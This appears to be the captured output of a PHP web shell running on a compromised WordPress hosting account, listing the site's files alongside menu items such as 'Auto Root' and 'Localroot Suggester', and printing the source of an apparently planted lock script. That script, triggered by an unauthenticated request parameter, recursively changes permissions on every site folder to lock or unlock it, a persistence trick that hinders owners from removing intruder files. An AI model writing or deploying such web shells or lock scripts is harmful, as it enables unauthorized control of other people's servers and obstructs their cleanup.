Linux premium309.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
Server IP : 199.188.201.183 & Your IP : 216.73.216.116
Domains :
Cant Read [ /etc/named.conf ]
User : brntxyqh
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
brntxyqh /
maindisinibre3.click /
Delete
Unzip
Name
Size
Permission
Date
Action
wp-admin
[ DIR ]
drwxr-xr-x
2026-02-04 02:19
wp-content
[ DIR ]
drwxr-xr-x
2026-02-04 02:19
wp-includes
[ DIR ]
drwxr-xr-x
2026-02-11 00:02
.data
4.25
KB
-rw-r--r--
2026-02-09 04:33
.ent
61
B
-rw-r--r--
2026-02-08 11:06
.entity
52
B
-rw-r--r--
2026-02-10 23:43
.litespeed_flag
297
B
-rw-r--r--
2026-02-11 02:31
adminfuns.php
1.17
MB
-r-xr-xr-x
2026-02-04 02:14
bad.php
0
B
-rw-r--r--
2026-02-07 09:49
cache_magics.php
0
B
-rw-r--r--
2026-02-09 09:58
error_log
3.56
KB
-r-xr-xr-x
2026-02-04 07:37
gallery.lang_en.php
2.35
KB
-rw-r--r--
2025-10-27 01:24
gallery.php
1.58
KB
-rw-r--r--
2025-10-27 01:24
helpsites.php
3.76
KB
-rw-r--r--
2025-10-27 01:24
ldi.php
673
B
-rw-r--r--
2025-10-27 01:24
ldi_check.php
1.59
KB
-rw-r--r--
2025-10-27 01:24
lock.php
1.93
KB
-r-xr-xr-x
2026-02-04 02:41
logoff.php
3.04
KB
-rw-r--r--
2025-10-27 01:24
sched.php
3.58
KB
-rw-r--r--
2025-10-27 01:24
sched_planets.php
4.25
KB
-rw-r--r--
2025-10-27 01:24
sitemap.php
1.73
KB
-rw-r--r--
2025-10-27 01:24
toolbar.cache.php
1.6
KB
-rw-r--r--
2025-10-27 01:24
toolbar.php
666
B
-rw-r--r--
2025-10-27 01:24
wp.php
3.86
KB
-rw-r--r--
2025-10-27 01:24
Save
Rename
<?php $path = $_SERVER['DOCUMENT_ROOT']; $protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? "https" : "http"; $host = $_SERVER['HTTP_HOST']; $url = $protocol . "://" . $host . $_SERVER['SCRIPT_NAME']; $type = $_REQUEST['type']; $count = 0; if($type == 'lock'){ $folder_list = getAllFolders($path, 8); foreach($folder_list as $k=>$v){ $flag = chmodFolder($v, 0555); if($flag){$count++;} } echo 'all is '.count($folder_list).';'.$count.'is lock success'; }else if($type == 'unlock'){ $folder_list = getAllFolders($path, 8); foreach($folder_list as $k=>$v){ $flag = chmodFolder($v, 0755); $file_url = $v.'/.htaccess'; chmodFolder($file_url, 0755); if($flag){$count++;} } echo 'all is '.count($folder_list).';'.$count.'is unlock success'; } function getAllFolders($path = '.', $maxDepth = 8, $currentDepth = 1) { $directories = []; if ($currentDepth > $maxDepth) { return $directories; } $items = scandir($path); foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $fullPath = $path . DIRECTORY_SEPARATOR . $item; if (is_dir($fullPath)) { $directories[] = $fullPath; $subDirs = getAllFolders($fullPath, $maxDepth, $currentDepth + 1); $directories = array_merge($directories, $subDirs); } } return $directories; } function chmodFolder($dir, $dirMode){ $flag = false; if (chmod($dir, $dirMode)) { $flag = true; } else { $flag = false; } return $flag; } ?> <html> <head> <title>test</title> <head> <body> <a href="<?php echo $url;?>?type=lock&time=<?php echo time();?>">全部锁文件夹</a> <a href="<?php echo $url;?>?type=unlock&time=<?php echo time();?>">全部解锁</a> </body> </html>